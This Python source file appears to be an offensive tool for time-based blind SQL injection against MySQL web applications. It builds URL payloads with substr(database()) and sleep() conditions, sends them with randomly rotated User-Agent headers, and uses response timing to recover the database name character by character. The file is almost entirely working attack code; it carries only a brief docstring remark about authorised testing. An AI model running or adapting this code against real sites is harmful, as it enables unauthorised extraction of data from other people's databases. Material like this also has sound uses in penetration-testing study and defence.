# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:22
@Auth : zhangxiang
@File :BlindInject_Str.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
#字符型盲注取数据库名
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
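class BlindInject_Str(object):
    """Time-based blind SQL injection helper that reads the current MySQL
    database name one character at a time (string-context injection).

    For every character position ``1..Length`` and every candidate in
    ``code`` one GET request is sent whose payload makes MySQL ``sleep(delay)``
    when the guess is right; a response slower than ``delay`` seconds is
    treated as a hit.

    NOTE(review): this is an offensive testing tool. Only run it against
    targets you are explicitly authorised to test; every request is logged
    server-side with the injected payload in the URL.
    """

    # Trailing query-string fragment; 0x5375626D6974 is the hex encoding of
    # "Submit" so no quotes are needed inside the injected statement.
    _SUBMIT_SUFFIX = "&submit=0x5375626D6974%23"

    def __init__(self):
        pass

    def _build_payload(self, position, candidate, delay=2):
        """Return the URL-encoded query fragment that tests one character guess.

        Args:
            position: 1-based offset into the database name (``substr`` index).
            candidate: the character being guessed. It is percent-encoded so
                that ``'``, ``#``, ``%`` or a backslash in the candidate
                alphabet cannot break the payload or the URL.
            delay: seconds MySQL should sleep on a correct guess.

        Returns:
            The string to append directly to the target URL.
        """
        encoded = parse.quote(candidate, safe="")
        condition = (
            "%20and%20if(substr((select%20database()),"
            + str(position)
            + ",1)=%27"
            + encoded
            + "%27,sleep("
            + str(delay)
            + "),1)%23"
        )
        return condition + self._SUBMIT_SUFFIX

    def StartInject_Str(self, code, StrList, url, Length, *, delay=2, timeout=None):
        """Brute-force the database name character by character.

        Args:
            code: iterable of candidate characters to try at each position.
            StrList: list that confirmed characters are appended to (mutated
                in place and also returned, matching the original contract).
            url: target URL up to and including the injectable parameter value;
                the payload is concatenated to it verbatim.
            Length: number of characters to recover (positions 1..Length).
            delay: seconds the target sleeps on a hit; also the detection
                threshold. Keep it clearly above normal round-trip latency,
                otherwise a slow network produces false positives.
            timeout: socket timeout passed to ``urlopen``; ``None`` (the
                default) blocks indefinitely. If set, it must exceed ``delay``
                or every true hit raises a timeout instead of being detected.

        Returns:
            ``StrList`` with the recovered characters appended.

        Raises:
            urllib.error.URLError / HTTPError: propagated unchanged from
                ``urlopen`` so a misbehaving target is not silently skipped.
        """
        for position in range(1, Length + 1):
            for candidate in code:
                full_url = url + self._build_payload(position, candidate, delay)
                headers = {'User-Agent': random.choice(ua_list)}
                req = request.Request(url=full_url, headers=headers)
                # monotonic clock: wall-clock adjustments must not skew the
                # timing oracle. The response is closed immediately; the
                # sleep happens before headers are sent, so the body is not
                # needed.
                start = time.monotonic()
                with request.urlopen(req, timeout=timeout):
                    pass
                elapsed = time.monotonic() - start
                if elapsed > delay:
                    print("*" * 200)
                    StrList.append(candidate)
                    print("得到盲注结果:" + str(StrList))
                    print("注入的payload:" + full_url)
                    print("使用的时间:" + str(elapsed))
                    print("*" * 200)
                    # A position has exactly one character; stop testing the
                    # remaining candidates so no duplicate hits are appended.
                    break
        return StrList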